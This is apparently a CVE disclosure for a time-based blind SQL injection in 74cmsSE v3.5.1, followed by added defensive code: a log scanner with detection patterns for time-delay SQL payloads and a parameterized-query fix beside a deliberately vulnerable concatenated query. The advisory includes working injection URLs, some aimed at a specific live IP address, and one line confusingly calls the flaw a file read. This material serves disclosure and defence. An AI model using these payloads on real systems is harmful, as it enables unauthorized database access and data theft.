CVE-2022-33094: SQL Injection vulnerability · Issue #4 · PAINCLOWN/74cmsSE-Arbitrary-File-Reading
74cmsSE v3.5.1 was discovered to contain a SQL injection vulnerability via the keyword parameter at /home/job/map.
Exploit Title: SQL Injection vulnerability on 74cmsSE_v3.5.1
Date of Discovery: 21/4/2022
Product version: 74cmsSE_v3.5.1
Download link: http://www.74cms.com/downloadse/show/id/68.html
Vulnerability Description:
74cmsSE_v3.5.1 contains a time-based blind SQL injection that allows an attacker to run malicious SQL statements against the database, which can be exploited to execute unauthorized SQL commands and obtain sensitive database data.
POC:
Payload:
/v1_0/home/job/map?keyword=/%27%2B(select%20if(now()=sysdate(),sleep(2),0))%2B%27/&north_east_lat=1&north_east_lng=11&page=1&pagesize=5&south_west_lat=1&south_west_lng=1
In the path /v1_0/home/job/map, the $keyword parameter is not strictly filtered, resulting in SQL injection.
exp1:
http://124.223.95.129:8766/v1_0/home/job/map?keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(2),0))%2B%27*/&north_east_lat=1&north_east_lng=11&page=1&pagesize=5&south_west_lat=1&south_west_lng=1
As you can see from the figure above, the sleep() function is executed, confirming a time-based blind SQL injection.
With the payload above, the delayed function executed in 2 out of 2 attempts.
A time-based blind injection can also be used to determine the length of the database name:
exp2:
http://124.223.95.129:8766/v1_0/home/job/map?keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(length(database())),0))%2B%27*/&north_east_lat=1&north_east_lng=11&page=1&pagesize=5&south_west_lat=1&south_west_lng=1
As shown in the following figure, the arbitrary file read vulnerability reveals that the website's database name is "qscms2", and the observed delay was exactly double the length of database(), so the injection is successful.
It is a time-based SQL injection.
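Because the flaw is confirmed purely by response delay, a defender's first question is whether such probes show up in the web server logs. The following Python script is added here and is not part of the original issue or of the 74cmsSE project: it parses combined-format access log lines and flags query parameters carrying time-delay primitives (MySQL sleep()/benchmark(), PostgreSQL pg_sleep(), MSSQL WAITFOR DELAY) or the now()=sysdate() comparison used in this PoC. The log lines, client IPs and timestamps are constructed for the demo, and the signature list is an editorial choice rather than a vendor rule set.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines (Apache/Nginx combined-style format); they are
# not taken from the original report. The first two carry the same kind of
# keyword payload the issue describes, the last two are benign searches.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Apr/2022:10:00:01 +0000] "GET /v1_0/home/job/map?keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(2),0))%2B%27*/&north_east_lat=1&page=1 HTTP/1.1" 200 512
10.0.0.5 - - [21/Apr/2022:10:00:06 +0000] "GET /v1_0/home/job/map?keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(length(database())),0))%2B%27*/&page=1 HTTP/1.1" 200 512
10.0.0.7 - - [21/Apr/2022:10:00:09 +0000] "GET /v1_0/home/job/map?keyword=java%20developer&north_east_lat=1&page=1 HTTP/1.1" 200 2048
10.0.0.9 - - [21/Apr/2022:10:00:12 +0000] "GET /v1_0/home/job/map?keyword=sleep%20study%20nurse&page=1 HTTP/1.1" 200 1980
"""

# Time-delay primitives across common engines plus the now()=sysdate()
# comparison from the report's PoC. Each pattern requires the opening
# parenthesis (or the DELAY keyword) so ordinary words like "sleep study"
# do not trigger.
TIME_BASED_SIGNATURES = [
    ("mysql_sleep", re.compile(r"\bsleep\s*\(", re.I)),
    ("mysql_benchmark", re.compile(r"\bbenchmark\s*\(", re.I)),
    ("pg_sleep", re.compile(r"\bpg_sleep\s*\(", re.I)),
    ("mssql_waitfor", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("now_eq_sysdate", re.compile(r"\bnow\s*\(\s*\)\s*=\s*sysdate\s*\(\s*\)", re.I)),
]

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def matched_signatures(value):
    """Return the signature names that fire on one parameter value.

    The value is checked as parse_qs decoded it and after one extra
    percent-decoding pass, so a double-encoded payload is not missed.
    """
    candidates = {value, unquote(value)}
    return [name for name, pattern in TIME_BASED_SIGNATURES
            if any(pattern.search(c) for c in candidates)]


def scan_log(text):
    """Parse log lines and flag query parameters carrying time-based SQLi signatures."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        parts = urlsplit(m.group("target"))
        for param, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                hits = matched_signatures(value)
                if hits:
                    findings.append({
                        "ip": m.group("ip"),
                        "ts": m.group("ts"),
                        "path": parts.path,
                        "param": param,
                        "value": value,
                        "signatures": hits,
                    })
    return findings


def offenders_by_ip(findings):
    """Count flagged requests per client address, a quick triage view."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']} {f['ip']} {f['path']} param={f['param']} sigs={f['signatures']}")
    print(offenders_by_ip(found))
```

Only the two requests from 10.0.0.5 are flagged, each on the keyword parameter with both the sleep() and now()=sysdate() signatures; the benign "sleep study nurse" search is not, because the signature needs a call parenthesis. In production the same check is better placed on the raw request at the WAF or application layer, and a single hit is a candidate for correlation with response-time outliers rather than an automatic block.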
Suggestion: add a filter function for this parameter.
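The suggestion above is to filter the parameter; the durable fix is to stop the keyword from ever being interpreted as SQL, with input validation as a second layer. The Python/SQLite example below is added here and is not 74cmsSE's code (the project is PHP, and its real schema and query differ): it places the concatenated query beside the parameterized one and adds an assumed allowlist filter for the keyword. SQLite has no sleep() or if(), so the concatenated form fails with "no such function" instead of delaying, which is itself evidence that the injected text reached the engine as code, whereas the bound-parameter form treats the same string as literal search text.

```python
import re
import sqlite3

# The report's keyword value, URL-decoded, used here only as test input.
REPORTED_PAYLOAD = "/*'+(select if(now()=sysdate(),sleep(2),0))+'*/"


def make_demo_db():
    """Constructed in-memory schema for the demo; not 74cmsSE's real schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE job (id INTEGER PRIMARY KEY, title TEXT, lat REAL, lng REAL)")
    conn.executemany(
        "INSERT INTO job (title, lat, lng) VALUES (?, ?, ?)",
        [("Java developer", 1.0, 2.0), ("Python developer", 1.5, 3.0), ("Nurse", 5.0, 5.0)],
    )
    return conn


def search_concatenated(conn, keyword):
    """Vulnerable pattern: the keyword is spliced into the SQL text."""
    sql = "SELECT title FROM job WHERE title LIKE '%" + keyword + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, keyword):
    """Hardened form: the keyword travels as a bound parameter, never as SQL."""
    sql = "SELECT title FROM job WHERE title LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + keyword + "%",))]


# Assumed allowlist for a job-search keyword: letters, digits, whitespace and a
# few characters common in job titles (C++, C#, .NET, UI/UX), capped at 64
# characters. An illustrative policy, to be tuned to the application.
KEYWORD_OK = re.compile(r"^[\w\s.+#/&-]{1,64}$")


def keyword_is_acceptable(keyword):
    """Return True when the keyword matches the allowlist above."""
    return bool(KEYWORD_OK.match(keyword))


def search_filtered(conn, keyword):
    """Both layers together: reject malformed input, then bind the parameter.

    Returns None when the keyword is rejected; a web handler would map that
    to an HTTP 400 rather than silently searching for a sanitized string.
    """
    if not keyword_is_acceptable(keyword):
        return None
    return search_parameterized(conn, keyword)


def payload_reaches_engine(conn, keyword):
    """True if the concatenated query makes the database try to execute the
    injected function calls. SQLite has no sleep()/if(), so it raises
    'no such function' instead of sleeping; MySQL would run them."""
    try:
        search_concatenated(conn, keyword)
    except sqlite3.OperationalError as exc:
        return "no such function" in str(exc)
    return False


if __name__ == "__main__":
    db = make_demo_db()
    print("parameterized, normal keyword:", search_parameterized(db, "developer"))
    print("parameterized, reported payload:", search_parameterized(db, REPORTED_PAYLOAD))
    print("concatenated, payload executed as SQL:", payload_reaches_engine(db, REPORTED_PAYLOAD))
    print("filter accepts 'Java developer':", keyword_is_acceptable("Java developer"))
    print("filter accepts reported payload:", keyword_is_acceptable(REPORTED_PAYLOAD))
```

The filter alone is not the fix: an allowlist that is too narrow breaks legitimate searches, and one that is too wide leaves gaps, while the bound parameter removes the injection regardless of what the filter lets through. Keep the filter for early rejection and logging, and make the parameterized query the control you rely on.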